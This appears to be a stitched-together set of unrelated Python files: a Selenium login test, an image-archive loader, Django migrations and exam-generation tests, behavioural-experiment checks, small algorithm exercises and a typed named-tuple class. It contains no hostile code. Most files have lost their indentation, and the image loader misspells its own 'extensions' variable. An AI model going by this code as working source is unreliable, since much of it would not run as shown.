self.driver.save_screenshot(".\\Screenshots\\" + "test_loginTitle.png")
self.driver.close()
assert False
self.logger.info("****** TestLogin001_test_welcome_page Completed ******")
@pytest.mark.smoke
@pytest.mark.sanity
def test_login(self, setup):
self.logger.info("****** TestLogin001_test_login Started ******")
self.logger.info("****** Importing setup ******")
self.driver = setup
self.driver.get(self.baseURL)
self.login = LoginPage(self.driver)
self.login.setUserName(self.username)
self.login.setPassWord(self.password)
self.login.clickLogin()
self.logger.info("****** Performing login ******")
title = self.driver.title
self.logger.info("****** Verifying title ******")
if title == "Swag Labs":
self.logger.info("****** Success ******")
self.driver.close()
assert True
else:
self.logger.error("****** Failed ******")
self.driver.save_screenshot(".\\Screenshots\\" + "test_login.png")
self.driver.close()
assert False
self.logger.info("****** TestLogin001_test_login Completed ******")
|
# coding: utf-8
import os, io, sys, tarfile, zipfile
import numpy as np
from PIL import Image
"""
Compression file should be the following architecture.
Compression file
|-- Label A
| |-- image file
| |-- image file
|-- Label B
| |-- image file
| |-- image file
"""
extentions = ["jpg", "JPG", "png", "PNG"]
def load_zip_file(path, resize):
    """
    Load images from a '.zip' archive.
    """
    if type(resize) is not tuple or len(resize) != 2:
        print("Parameter 'resize' should be a tuple of length two.")
        return
    images = {}
    loaded_num, error_num = 0, 0
    with zipfile.ZipFile(path, 'r') as zf:
        for idx, f in enumerate(zf.namelist()):
            if sys.version_info < (3, 8):
                if f[-3:] not in extensions:
                    label_name = f[f[:-1].rfind("/")+1:-1]
                    images[label_name] = np.array([])
                    print("Start loading. Label name is %s." % label_name)
                    continue
            else:
                label_name = f[f.find("/")+1:f.find("/")+2]
                if label_name not in images.keys():
                    images[label_name] = np.array([])
                    print("Start loading. Label name is %s." % label_name)
            try:
                img = np.array(Image.open(io.BytesIO(zf.read(f))).resize(resize))
                images[label_name] = np.append(images[label_name], img).reshape(-1, *img.shape)
                loaded_num += 1
            except Exception:
                print("File '%s' could not be loaded." % f)
                error_num += 1
    for key, imgs in images.items():
        print("Label %s's shape is %s" % (key, imgs.shape))
        images[key] = imgs.astype(int)
    print("The number of loaded files was %s." % loaded_num)
    print("The number of error files was %s." % error_num)
    return images
def load_tar_file(path, resize):
    """
    Load images from a '.tar' or '.tar.gz' archive.
    """
    if type(resize) is not tuple or len(resize) != 2:
        print("Parameter 'resize' should be a tuple of length two.")
        return
    images = {}
    loaded_num, error_num = 0, 0
    tar = tarfile.open(path, 'r')
    for idx, f in enumerate(tar):
        if idx == 0:  # Index 0 is the tar file name.
            continue
        if f.name[-3:] not in extensions:
            label_name = f.name[f.name.rfind("/")+1:]
            images[label_name] = np.array([])
            print("Start loading. Label name is %s." % label_name)
            continue
        try:
            img = tar.extractfile(f.name)
            img = np.array(Image.open(io.BytesIO(img.read())).resize(resize))
            images[label_name] = np.append(images[label_name], img).reshape(-1, *img.shape)
            loaded_num += 1
        except Exception:
            print("File '%s' could not be loaded." % f)
            error_num += 1
    tar.close()
    for key, imgs in images.items():
        print("Label %s's shape is %s" % (key, imgs.shape))
        images[key] = imgs.astype(int)
    print("The number of loaded files was %s." % loaded_num)
    print("The number of error files was %s." % error_num)
    return images
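# A minimal usage sketch (the archive path is a made-up placeholder):
#
#   data = load_zip_file("dataset.zip", resize=(64, 64))
#   for label, imgs in data.items():
#       print(label, imgs.shape)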
|
# Generated by Django 2.2.3 on 2019-07-04 10:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('skolr', '0003_auto_20190704_0710'),
]
operations = [
migrations.AddField(
model_name='teacher',
name='typ',
field=models.CharField(default=1, max_length=100),
preserve_default=False,
),
]
|
# FUNCTIONS TO CHECK COLLECTED BEHAVIORAL DATA FOR ATTENTION AND MEMORY EXPERIMENT
import os
import pickle
import pandas as pd
from matplotlib import pyplot as plt
# Functions to Aggregate Subject Data and Verify Correct Stimuli were Presented
def sum_pd(subdir):
'''
input: subject directory (string)
output: full experiment info (dataframe)
'''
files = [ x for x in os.listdir(subdir) if 'pres' in x or 'mem' in x ]
df_list = [ pd.read_csv(subdir+'/'+x) for x in files ]
df = pd.concat(df_list, ignore_index=True)
return(df)
def images(df_col):
'''
input: df column
output: list of image names (strings)
'''
return([ x for x in df_col if type(x)==str])
def check_reps(lst):
'''
input: list of imagenames (strings)
output: number of repeats (int)
'''
return(len(lst)-len(set(lst)))
def list_compare(lst1, lst2):
'''
input: two lists
output: number of shared items between lists
'''
return(set(lst1) & set(lst2))
def check_shared(df, col1, col2,x=None):
'''
inputs: dataframe, two column names (strings), run#=None
outputs: lists images shared between the columns, if any exist
'''
if type(x)==int:
mask = df['Run']==x
msg = list_compare(list(images(df.loc[mask,col1])), list(images(df.loc[mask,col2])))
else:
msg = list_compare(list(images(df[col1])), list(images(df[col2])))
    return(msg)
def validity_check(df, params):
'''
inputs: dataframe, parameters
    outputs: if there is an error, a message about the
    validity percentage (list containing string)
'''
msg = []
if len(df.Run.unique())<params['runs']:
msg = ["It looks like there is test data here! (Fewer than expected # of runs). "]
if len(msg)==0:
if df['Cue Validity'].sum()/(float(params['runs']*params['presentations_per_run'])) != .9:
if len(df.Run.unique())==params['runs']:
msg.append('Incorrect number of invalid attention circles. '+str(params['presentations_per_run']*params['runs']*(100-params['invalid_cue_percentage'])/100))
if len(msg)>0:
return(msg)
def stimulus_check(subdir, params):
'''
input: subject directory (string)
output: message indicating if all stimulus proportions are correct (string)
'''
msg = []
select_cols = ['Cued Face', 'Cued Place',
'Uncued Face', 'Uncued Place',
'Memory Image']
df = sum_pd(subdir)
for x in select_cols:
# check internal repetitions
if check_reps(df[x]) > 0:
msg.append('Internal repetition in '+x+'. ')
# check correct proportion in memory runs, by run
for run in range(params['runs']):
if x!='Memory Image':
if len(check_shared(df, x, 'Memory Image', run)) != params['presentations_per_run']*2/params['mem_to_pres']:
msg.append('Wrong number of prev seen images from one or more categories. ')
print(x, check_shared(df, x, 'Memory Image', run))
# check no composites shown attended AND unattended side, total
if len(check_shared(df[df['Trial Type']=='Presentation'],'Cued Composite', 'Uncued Composite'))>0:
msg.append('Overlapping cued and uncued composites. ')
# check no repeats within composite columns (cued, uncued)
if check_reps(df['Cued Composite']) + check_reps(df['Uncued Composite']) > 0:
msg.append('Repeat within cued or uncued composites. ')
msg.append(validity_check(df, params))
if len(msg)==1 and msg[0]==None:
msg.append("All stimulus proportions correct!")
return(msg)
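# A minimal usage sketch (the subject directory and parameter values are
# made-up placeholders; the keys match what validity_check and stimulus_check
# read):
#
#   params = {'runs': 8, 'presentations_per_run': 10,
#             'mem_to_pres': 2, 'invalid_cue_percentage': 10}
#   print(stimulus_check('./subj01', params))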
|
# -*- coding: utf-8 -*-
from collections import Counter
from functools import reduce
from math import gcd
class Solution:
    def hasGroupsSizeX(self, deck):
        # Groups of equal size X >= 2 exist iff the gcd of all the card
        # counts is at least 2 (a gcd check in place of per-count remainders).
        counts = Counter(deck).values()
        return reduce(gcd, counts) >= 2
if __name__ == "__main__":
solution = Solution()
assert solution.hasGroupsSizeX([1, 2, 3, 4, 4, 3, 2, 1])
assert not solution.hasGroupsSizeX([1, 1, 1, 2, 2, 2, 3, 3])
assert not solution.hasGroupsSizeX([1])
assert solution.hasGroupsSizeX([1, 1])
assert solution.hasGroupsSizeX([1, 1, 2, 2, 2, 2])
assert solution.hasGroupsSizeX([1, 1, 1, 1, 2, 2, 2, 2, 2, 2])
|
# Linear Queue
import array
class LinearQueue:
def __init__(self, capacity):
self.capacity = capacity
self.front = 0
self.rear = 0
self.array = array.array('l', [0]*capacity)
def put(self, value):
if self.rear == self.capacity:
return False
self.array[self.rear] = value
self.rear += 1
return True
def get(self):
if self.front == self.rear:
return None
value = self.array[self.front]
self.front += 1
return value
def peek(self):
if self.front == self.rear:
return None
else:
return self.array[self.front]
def print(self):
if self.front == self.rear:
print('empty')
else:
for i in range(self.front, self.rear):
print(self.array[i], end=' ')
print()
linearQueue = LinearQueue(5)
for i in range(8):
linearQueue.put(i + 1)
linearQueue.print()
print(linearQueue.get())
print(linearQueue.get())
linearQueue.print()
print(linearQueue.peek())
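# Expected output of the demo above (the puts of 6-8 fail, capacity is 5):
#   1 2 3 4 5
#   1
#   2
#   3 4 5
#   3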
|
# -*- coding: utf-8 -*-
"""
Avaliacao.test_models
~~~~~~~~~~~~~~
Testa coisas relacionada ao modelo.
:copyright: (c) 2011 by Felipe Arruda Pontes.
"""
import datetime
from django.test import TestCase
from model_mommy import mommy
from Avaliacao.models import Avaliacao, TemplateAvaliacao
from Materia.Turma.models import Turma
from Avaliacao.Questao.models import TipoQuestao, FiltroQuestao
from Aluno.models import Aluno
class AvaliacaoTest(TestCase):
def setUp(self):
self.avaliacao = mommy.make_one(Avaliacao)
def test_avaliacao_save(self):
" verifica se consegue salvar um avaliacao "
self.avaliacao.save()
self.assertEqual(self.avaliacao.id, 1)
class TemplateAvaliacaoTest(TestCase):
fixtures = ['test_alunos']
def setUp(self):
self.aluno = Aluno.objects.get(pk=1)
self.turma = mommy.make_one(Turma,nome="Teste",sigla="tst")
self.gerar_tipoQuestao()
self.gerar_Questoes()
def gerar_tipoQuestao(self):
"gera tipos de questao que sao denominados tipo1-10"
from Avaliacao.Questao.models import TipoQuestao
for i in xrange(1,11):
tipo = TipoQuestao(tipo="tipo%s"%str(i))
tipo.save()
# print "tipo %s"%str(tipo.id)
def gerar_Questoes(self):
"""gera questões mocked com tipo variando
"""
from Avaliacao.Questao.models import Questao
for i in xrange(1,21):
            #: basically when i=1 -> mod = 1; i=10 -> mod = 10; i=11 -> mod = 1; i=20 -> mod = 10
mod = i%10 if i != 10 and i != 20 else 10
            #: returns question types whose PK < i (never exceeding 10)
tipos = TipoQuestao.objects.filter(pk__lte=mod)
questao = mommy.make_one(Questao,tipo=tipos,titulo="questao%s"%str(i))
            # forcing verificada=True, since these questions are mocks and would not be verified automatically
            # (if they were, they would fail on the source file).
questao.verificada=True
questao.save(verificar=False)
print "q=%s i=%s mod=%s"%(questao.id,i,mod)
# questao.save()
def test_fixtures(self):
"testar as fixtures carregaram corretamente"
self.assertEquals(Aluno.objects.get(pk=1).slug,'123456')
def gerarFiltroQuestao(self,num_tipos,template):
"""gera filtros de questao para um determinado template,
considerando que vai pegar todos os tipos que tem pk <= num_tipos"""
tipos = TipoQuestao.objects.filter(pk__lte=num_tipos)
filtro = mommy.make_one(FiltroQuestao,templateAvaliacao=template,questaoExata=None,tipo=tipos)
return filtro
# for tipo in filtro.tipo.all():
# print "tipo %s"%str(tipo.id)
# print "="
# def test_gerarAvaliacao_templateAvaliacao(self):
# " verifica se consegue gerarAvaliacao por templateAvaliacao "
# self.templateAvaliacao = TemplateAvaliacao(titulo="Avaliacao Teste",turma=self.turma,ativa=True)
# self.templateAvaliacao.data_inicio = datetime.datetime.now()
# self.templateAvaliacao.data_termino = datetime.datetime.now() + datetime.timedelta(hours=2)
# self.templateAvaliacao.save()
# for i in xrange(1,11):
# self.gerarFiltroQuestao(i,self.templateAvaliacao)
# avaliacao = self.templateAvaliacao.gerarAvaliacao(self.aluno)
# self.assertEqual(avaliacao.titulo,self.templateAvaliacao.titulo)
# import pdb; pdb.set_trace()
# for i in xrange(0,10):
# questao = avaliacao.questoes.all()[i]
# self.assertIn(questao.questao.id,[i+1,i+11])
def test_list_templatesAvaliacao_aluno(self):
" verifica se o metodo list_templatesAvaliacao_aluno retorna todos os templates corretamente "
templates_list_espected= []
for turma_num in xrange(1,3):
turma = mommy.make_one(Turma,nome="Teste%s"%str(turma_num),sigla="tst%s"%str(turma_num))
if turma_num == 1:
turma.alunos.add(self.aluno)
for template_num in xrange(1,3):
templateAvaliacao = TemplateAvaliacao(titulo="Avaliacao Teste %s"%str(template_num),turma=turma,ativa=True)
templateAvaliacao.data_inicio = datetime.datetime.now()
templateAvaliacao.data_termino = datetime.datetime.now() + datetime.timedelta(hours=2)
templateAvaliacao.save()
for filtro in xrange(1,11):
self.gerarFiltroQuestao(filtro,templateAvaliacao)
if turma_num == 1 and template_num != 1:
templates_list_espected.append(templateAvaliacao)
if template_num == 1:
templateAvaliacao.gerarAvaliacao(self.aluno)
templates_list = TemplateAvaliacao.objects.list_templatesAvaliacao_aluno(self.aluno)
print "lista"
print templates_list
for template in templates_list:
self.assertIn(template,templates_list_espected)
for template in templates_list_espected:
self.assertIn(template,templates_list)
    # def test_gerar_simulado(self):
    #     " checks that generating an avaliacao for a student works correctly: filters, exact questions, etc. "
    #     from Avaliacao.Questao.models import Questao
    #     # prepare the avaliacao
    #     self.templateAvaliacao = TemplateAvaliacao(titulo="Avaliacao Teste Criacao",turma=self.turma,ativa=False)
    #     self.templateAvaliacao.data_inicio = datetime.datetime.now() + datetime.timedelta(hours=3)
    #     self.templateAvaliacao.data_termino = datetime.datetime.now() + datetime.timedelta(hours=5)
    #     self.templateAvaliacao.save()
    #     # prepare the filters
    #     for i in xrange(1,11):
    #         filtro = self.gerarFiltroQuestao(i,self.templateAvaliacao)
    #         # for the 5th filter, set up the exact-question case
    #         if i == 5:
    #             # point filter 5 at the question with id 4
    #             filtro.questaoExata = Questao.objects.get(pk=4)
    #             filtro.save()
    #             print "filtro %s" %(filtro.questaoExata)
    #     print ">>gerar simulado"
    #     # generate the avaliacao for a student (in this case a simulado)
    #     avaliacao = self.templateAvaliacao.gerarAvaliacao(self.aluno,True)
    #     # check the avaliacao has the same title as the templateAvaliacao
    #     self.assertEqual(avaliacao.titulo,self.templateAvaliacao.titulo)
    #     # check the questions were selected correctly: if the 4th question is the one
    #     # with id 4, then the 5th (the exact one) must be "randomized" to the only
    #     # remaining option, id 14; otherwise it must be exactly the opposite, and
    #     # anything else is an error!
    #     quarta_questao = avaliacao.questoes.all()[3].questao
    #     quinta_questao = avaliacao.questoes.all()[4].questao
    #     msg_erro="the exact question was not generated correctly in the simulado %d - %d"
    #     self.assertFalse(quarta_questao.id==quinta_questao.id,"%d -%d"%(quarta_questao.id,quinta_questao.id))
    #     if quarta_questao.id == 4:
    #         self.assertEqual(quinta_questao.id,14,msg_erro%(quinta_questao.id,14))
    #     elif quarta_questao.id == 14:
    #         self.assertEqual(quinta_questao.id,4,msg_erro%(quinta_questao.id,4))
    #     else:
    #         self.fail(u"the fourth question was neither 4 nor 14, which is wrong.")
class GerarAvaliacaoTest(TestCase):
fixtures = ['test_alunos']
def setUp(self):
self.aluno = Aluno.objects.get(pk=1)
self.turma = mommy.make_one(Turma,nome="Teste",sigla="tst")
self.gerar_tipoQuestao()
self.gerar_Questoes()
self.gerarTemplate()
def gerar_tipoQuestao(self):
"gera tipos de questao que sao denominados tipo1-10, com 3 filhos cada(nomeados tipoX-1-tipoX-3)"
from Avaliacao.Questao.models import TipoQuestao
for i in xrange(1,11):
tipo = TipoQuestao(tipo="tipo%s"%str(i))
tipo.save()
for j in xrange(1,4):
tipo_filho = TipoQuestao(tipo="tipo%s-%s" % (i,j), tipoPai=tipo)
tipo_filho.save()
# print "tipo %s"%str(tipo.id)
def gerar_Questoes(self):
"""gera questoes mocked com tipo variando
"""
import random
from Avaliacao.Questao.models import Questao
for i in xrange(1,31):
            #: basically when i=1 -> mod = 1; i=10 -> mod = 10; i=11 -> mod = 1; i=20 -> mod = 10
mod = i%10
if mod == 0:
mod = 10
            #: returns question types whose PK < i (never exceeding 10)
tipos_pai = TipoQuestao.objects.filter( tipo__in = ["tipo%s"%str(j) for j in xrange(1,mod+1)] )
tipos_escolhidos = []
for tipo_pai in tipos_pai:
tipos_filho_e_proprio=tipo_pai.get_descendants(include_self=True)
rand_tipo = random.randint(0, tipos_filho_e_proprio.__len__()-1)
tipos_escolhidos.append( tipos_filho_e_proprio[rand_tipo] )
questao = mommy.make_one(Questao,tipo=tipos_escolhidos,titulo="questao%s"%str(i))
            # forcing verificada=True, since these questions are mocks and would not be verified automatically
            # (if they were, they would fail on the source file).
questao.verificada=True
questao.save(verificar=False)
print "q=%s i=%s mod=%s"%(questao.id,i,mod)
# questao.save()
def gerarFiltroQuestaoParaTemplate(self,num_tipos,template):
"""gera filtros de questao para um determinado template,
considerando que vai pegar todos os tipos que tem pk <= num_tipos"""
tipos_pai = TipoQuestao.objects.filter( tipo__in = ["tipo%s"%str(j) for j in xrange(1,num_tipos+1)] )
#tipos = TipoQuestao.objects.filter(pk__lte=num_tipos)
filtro = mommy.make_one(FiltroQuestao,templateAvaliacao=template,questaoExata=None,tipo=tipos_pai)
return filtro
def gerarTemplate(self):
"gera um template com filtro coerentes"
from Avaliacao.Questao.models import Questao
        # prepare the avaliacao
self.templateAvaliacao = TemplateAvaliacao(titulo="Avaliacao Teste Filtros",turma=self.turma,ativa=True)
self.templateAvaliacao.data_inicio = datetime.datetime.now() - datetime.timedelta(hours=3)
self.templateAvaliacao.data_termino = datetime.datetime.now() + datetime.timedelta(hours=5)
self.templateAvaliacao.save()
        # prepare the filters
        # the avaliacao has 10 questions
for num_tipos in xrange(1,11):
filtro = self.gerarFiltroQuestaoParaTemplate(num_tipos,self.templateAvaliacao)
            # for the 5th filter, set up the exact-question case
if num_tipos == 5:
                # point filter 5 at the question with id 1
filtro.questaoExata = Questao.objects.get(pk=1)
filtro.save()
print "filtro %s" %(filtro.questaoExata)
def test_fixtures(self):
"testar as fixtures carregaram corretamente"
self.assertEquals(Aluno.objects.get(pk=1).slug,'123456')
def test_filtrarQuestao(self):
"testar se um filtroQuestao(pk=6) retorna corretamente as questoes possiveis"
for num_id in xrange(1,11):
filtro = FiltroQuestao.objects.get(pk=num_id)
lista_ids_questoes=[]
for i in xrange(num_id,11):
lista_ids_questoes.append(i)
lista_ids_questoes.append(i+10)
lista_ids_questoes.append(i+20)
if num_id == 5:
lista_ids_questoes= [1]
print "lista_ids_questoes>> %s" % str(lista_ids_questoes)
questoes_selecionadas = filtro.filtrarQuestao()
msg_erro="Questao de pk:%s nao esta dentro da lista que questoes possiveis do filtro de pk:%s"
for questao in questoes_selecionadas:
self.assertIn(questao.pk, lista_ids_questoes, msg_erro%(questao.pk,num_id))
def test_gerarAvaliacao(self):
"testa se a avaliacao foi gerada corretamente"
avaliacao = self.templateAvaliacao.gerarAvaliacao(self.aluno)
        # check the avaliacao has the same title as the templateAvaliacao
self.assertEqual(avaliacao.titulo,self.templateAvaliacao.titulo)
msg_error="Questao de Avaliacao: %s nao esta presente na lista de questoes possiveis para o filtro:%s"
questoes_selecionadas = []
        # check the questions were selected correctly
for i in xrange(0,10):
questaoAvaliacao = avaliacao.questoes.all()[i]
filtroCorrespondente = questaoAvaliacao.filtro
print ">>>> I :%d" % i
self.assertNotIn(questaoAvaliacao.questao, questoes_selecionadas)
self.assertIn(questaoAvaliacao.questao,filtroCorrespondente.filtrarQuestao())
questoes_selecionadas.append(questaoAvaliacao.questao)
class GerarAvaliacaoCasoA1Test(TestCase):
"""
fazendo isso basado no caso A1 descrito na documentacao
Basicamente:
q1 -> C, Facil
q2 -> C, Facil
q3 -> C.malloc, Facil
q4 -> C++, Facil
q5 -> C,C++, c.malloc, Facil
Avaliação ->
1 -> q1
2 -> C, Facil
3 -> Facil, C.Malloc
Resultado esperado ->
1 -> q1
2 -> C, Facil (q2, q5)
3 -> Facil, C.Malloc (q3, q5)
Resultado ->
1 -> Facil, C.Malloc
2 -> C, Facil
3 -> q5 ou q1(aleatoriamente)
"""
fixtures = ['test_alunos']
def setUp(self):
self.aluno = Aluno.objects.get(pk=1)
self.turma = mommy.make_one(Turma,nome="Teste",sigla="tst")
self.gerar_tipoQuestao()
self.gerar_Questoes()
self.gerarTemplate()
def gerar_tipoQuestao(self):
"gera tipos de questao que sao denominados tipo1-10, com 3 filhos cada(nomeados tipoX-1-tipoX-3)"
from Avaliacao.Questao.models import TipoQuestao
tipo_C = TipoQuestao(tipo="C")
tipo_C.save()
tipo_C_Malloc = TipoQuestao(tipo="Malloc", tipoPai=tipo_C)
tipo_C_Malloc.save()
tipo_CPP = TipoQuestao(tipo="CPP")
tipo_CPP.save()
tipo_Facil = TipoQuestao(tipo="Facil")
tipo_Facil.save()
def gerar_Questoes(self):
"""gera questoes mocked com tipo variando
"""
import random
from Avaliacao.Questao.models import Questao
tipos=[]
#q1 -> C, Facil
tipos = TipoQuestao.objects.filter(tipo__in = ["C", "Facil"] )
q1 = mommy.make_one(Questao,tipo=tipos,titulo="questao1")
q1.verificada=True
q1.save(verificar=False)
#q2 -> C, Facil
tipos = TipoQuestao.objects.filter(tipo__in = ["C", "Facil"] )
q2 = mommy.make_one(Questao,tipo=tipos,titulo="questao2")
q2.verificada=True
q2.save(verificar=False)
#q3 -> C.malloc, Facil
tipos = TipoQuestao.objects.filter(tipo__in = ["Malloc", "Facil"] )
q3 = mommy.make_one(Questao,tipo=tipos,titulo="questao3")
q3.verificada=True
q3.save(verificar=False)
#q4 -> C++, Facil
tipos = TipoQuestao.objects.filter(tipo__in = ["CPP", "Facil"] )
q4 = mommy.make_one(Questao,tipo=tipos,titulo="questao4")
q4.verificada=True
q4.save(verificar=False)
#q5 -> C,C++, c.malloc, Facil
tipos = TipoQuestao.objects.filter(tipo__in = ["C","Malloc","CPP", "Facil"] )
q5 = mommy.make_one(Questao,tipo=tipos,titulo="questao5")
q5.verificada=True
q5.save(verificar=False)
def gerarTemplate(self):
"gera um template com filtro coerentes"
from Avaliacao.Questao.models import Questao
        # Avaliacao ->
        # 1 -> q1
        # 2 -> C, Facil
        # 3 -> Facil, C.Malloc
        # prepare the avaliacao
self.templateAvaliacao = TemplateAvaliacao(titulo="Avaliacao Teste Filtros",turma=self.turma,ativa=True)
self.templateAvaliacao.data_inicio = datetime.datetime.now() - datetime.timedelta(hours=3)
self.templateAvaliacao.data_termino = datetime.datetime.now() + datetime.timedelta(hours=5)
self.templateAvaliacao.save()
        # prepare the filters
        # the avaliacao has 3 questions
tipos = TipoQuestao.objects.filter(tipo__in = ["C", "Facil"] )
fq1 = mommy.make_one(FiltroQuestao,templateAvaliacao=self.templateAvaliacao,questaoExata=Questao.objects.get(pk=1),tipo=tipos)
fq1.save()
tipos = TipoQuestao.objects.filter(tipo__in = ["C", "Facil"] )
fq2 = mommy.make_one(FiltroQuestao,templateAvaliacao=self.templateAvaliacao,questaoExata=None,tipo=tipos)
fq2.save()
tipos = TipoQuestao.objects.filter(tipo__in = ["Facil","Malloc"] )
fq3 = mommy.make_one(FiltroQuestao,templateAvaliacao=self.templateAvaliacao,questaoExata=None,tipo=tipos)
fq3.save()
def test_fixtures(self):
"testar as fixtures carregaram corretamente"
self.assertEquals(Aluno.objects.get(pk=1).slug,'123456')
def test_filtrarQuestao(self):
"testar se um filtroQuestao(pk=6) retorna corretamente as questoes possiveis"
msg_erro="Questao de pk:%s nao esta dentro da lista que questoes possiveis do filtro de pk:%s"
fq1 = FiltroQuestao.objects.get(pk=1)
questoes_selecionadas1 = fq1.filtrarQuestao()
for questao in questoes_selecionadas1:
self.assertEquals([questao.pk,], [1,], msg_erro%(questao.pk,fq1.pk))
fq2 = FiltroQuestao.objects.get(pk=2)
questoes_selecionadas2 = fq2.filtrarQuestao()
num_questoes = questoes_selecionadas2.__len__()
self.assertEquals(num_questoes , 4, "filtro 2 nao teve numero correto de questoes. Esperava: %s mas veio %s" % (4, num_questoes))
for questao in questoes_selecionadas2:
questoes_ids = [1,2,3,5]
self.assertIn(questao.pk, questoes_ids , msg_erro%(questao.pk,fq2.pk))
fq3 = FiltroQuestao.objects.get(pk=3)
questoes_selecionadas3 = fq3.filtrarQuestao()
num_questoes = questoes_selecionadas3.__len__()
self.assertEquals(num_questoes , 2, "filtro 3 nao teve numero correto de questoes. Esperava: %s mas veio %s" % (2, num_questoes))
for questao in questoes_selecionadas3:
questoes_ids = [3,5]
self.assertIn(questao.pk, questoes_ids , msg_erro%(questao.pk,fq3.pk))
def test_gerarAvaliacao(self):
"testa se a avaliacao foi gerada corretamente"
        # Expected result ->
# 1 -> q1
# 2 -> C, Facil (q2, q5)
# 3 -> Facil, C.Malloc (q3, q5)
#
avaliacao = self.templateAvaliacao.gerarAvaliacao(self.aluno)
        # check the avaliacao has the same title as the templateAvaliacao
self.assertEqual(avaliacao.titulo,self.templateAvaliacao.titulo)
msg_error="Questao de Avaliacao: %s nao esta presente na lista de questoes possiveis para o filtro:%s"
possiveis_q1 = [1,]
possiveis_q2 = [2,3,5]
possiveis_q3 = [3,5]
q1 = avaliacao.questoes.all()[0]
self.assertIn(q1.questao.pk, possiveis_q1, msg_error % (q1, 1 ))
q2 = avaliacao.questoes.all()[1]
self.assertIn(q2.questao.pk, possiveis_q2, msg_error % (q2, 2 ))
q3 = avaliacao.questoes.all()[2]
self.assertIn(q3.questao.pk, possiveis_q3, msg_error % (q3, 3 ))
self.assertFalse(q1.questao.pk == q2.questao.pk)
self.assertFalse(q2.questao.pk == q3.questao.pk)
self.assertFalse(q1.questao.pk == q3.questao.pk)
print "q1: %s" % (q1,)
print "q2: %s" % (q2,)
print "q3: %s" % (q3,)
|
from __future__ import print_function
import copy
from collections import OrderedDict
from functools import partial
from operator import itemgetter as _itemgetter
import six
# TypedNamedTuple is largely structured the way the code generated by
# NamedTuple is structured. However, by itself it is empty. When a
# child class is created, the metaclass on TypedNamedTuple
# (TypedNamedTupleMeta) iterates over the new class looking for TProp
# class properties, which it will then use to build the field list,
# actual tuple, and the properties indexed into the tuple, just like
# on a named tuple.
# TypedNamedTupleMeta also saves the type information into a new field
# on the resulting class (_types). TypedNamedTuple's __new__ method
# will use that type information for all incoming parameters for the
# new instance, and raise a TypeError (or whatever the type itself
# raises on an incompatible input.
class TypedNamedTupleMeta(type):
def __new__(mcl, name, parents, dct):
if name == "TypedNamedTuple":
return super(TypedNamedTupleMeta,
mcl).__new__(mcl, name, parents, dct)
fields = []
for k, v in dct.items():
if k.startswith("_"):
continue
if isinstance(v, TProp):
fields.append((k,) + v)
if fields:
fields = sorted(fields, key=lambda f: f[1])
field_names = tuple(f[0] for f in fields)
new_dct = {k: v for k, v in dct.items() if k not in field_names}
if fields:
new_dct["_fields"] = field_names
types = {}
for field_name, idx in zip(field_names, range(len(field_names))):
new_dct[field_name] = property(_itemgetter(idx),
doc='Alias for field number %d' % idx)
types[field_name] = fields[idx][2]
new_dct["_types"] = types
# Make vars() work on result
new_dct["__dict__"] = property(parents[0]._asdict)
ret = super(TypedNamedTupleMeta,
mcl).__new__(mcl, name, parents, new_dct)
return ret
class TProp(tuple):
cnt = 0
def __new__(_cls, typ):
if type(typ) is not type:
raise TypeError('typ argument must be a type.')
cnt = _cls.cnt
_cls.cnt += 1
return tuple.__new__(_cls, (cnt, typ))
@classmethod
def _reset(_cls):
_cls.cnt = 0
IntProp = partial(TProp, int)
FloatProp = partial(TProp, float)
StrProp = partial(TProp, str)
@six.add_metaclass(TypedNamedTupleMeta)
class TypedNamedTuple(tuple):
__slots__ = ()
_fields = ()
_types = {}
def __new__(_cls, *args, **kw):
"""Create new instance of namedtype tuple."""
typed_args = _cls._type_check(*args, **kw)
return super(TypedNamedTuple, _cls).__new__(_cls, typed_args)
@classmethod
def _make(cls, iterable, new=tuple.__new__, len=len):
'Make a new NT object from a sequence or iterable'
result = new(cls, iterable)
if len(result) != len(cls._fields):
raise TypeError('Expected %d arguments, got %d' % (
len(cls._fields), len(result)))
return result
def __repr__(self):
'Return a nicely formatted representation string'
args = zip(self._fields, self)
arg_strs = ["%s=%r" % pair for pair in args]
return '%s(%s)' % (self.__class__.__name__,
", ".join(arg_strs))
def _asdict(self):
'Return a new OrderedDict which maps field names to their values'
return OrderedDict(zip(self._fields, self))
def _replace(_self, **kwds):
'Return a new object replacing specified fields with new values'
result = _self._make(map(kwds.pop, _self._fields, _self))
if kwds:
raise ValueError('Got unexpected field names: %r' % kwds.keys())
return result
def __getnewargs__(self):
'Return self as a plain tuple. Used by copy and pickle.'
return tuple(self)
def __getstate__(self):
'Exclude the OrderedDict from pickling'
pass
@classmethod
def _type_check(cls, *args, **kw):
"""Check types of args against cls expected types.
        If the argument already has the expected type, it is passed through.
        If it doesn't, the argument is passed through the type as a callable
        to see if coercion is possible.
"""
ret = []
if len(args) > len(cls._fields):
msg = ("__new__() takes %d positional arguments but %d were given"
% (len(cls._fields), len(args)))
raise TypeError(msg)
faz = zip(cls._fields, args)
for field, arg in faz:
typ = cls._types[field]
if isinstance(arg, typ):
ret.append(arg)
else:
ret.append(typ(arg))
missing = []
# Only look for fields not in arg list.
for field in cls._fields[len(ret):]:
if field in kw:
typ = cls._types[field]
arg = kw[field]
if isinstance(arg, typ):
ret.append(arg)
else:
ret.append(typ(arg))
else:
missing.append(field)
if missing:
raise TypeError("%s missing %d required positional argument%s: %s"
% (cls.__name__, len(missing),
"s" if len(missing)>1 else "",
", ".join([repr(m) for m in missing])))
return ret
def to_dict(self):
return dict(zip(self._fields, tuple(self)))
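# A minimal usage sketch of the machinery described above (the class and
# field names below are made up for illustration):
if __name__ == "__main__":
    class Point(TypedNamedTuple):
        x = IntProp()
        y = IntProp()
        label = StrProp()
    p = Point(1, "2", label="origin")  # "2" is coerced to int by _type_check
    print(p)                           # Point(x=1, y=2, label='origin')
    print(p.to_dict())                 # {'x': 1, 'y': 2, 'label': 'origin'}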
|
f = open("edinput.txt")
lines = f.readlines()
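# Each line is a boarding pass: F/B binary-partition the row range (0-127)
# and L/R the column range (0-7); the seat id is row * 8 + column.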
def update_position(min_v, max_v):
return min_v + (max_v - min_v) // 2
higher = -1
ids = []
for line in lines:
min_row = 0
max_row = 127
min_col = 0
max_col = 7
for c in line:
if c == 'F':
max_row = update_position(min_row, max_row)
elif c == 'B':
min_row = update_position(min_row, max_row) + 1
elif c == 'L':
max_col = update_position(min_col, max_col)
elif c == 'R':
min_col = update_position(min_col, max_col) + 1
seat_id = min_row * 8 + min_col
ids.append(seat_id)
higher = max([seat_id, higher])
print(higher)
ids = sorted(ids)
for i in range(0, len(ids)-1):
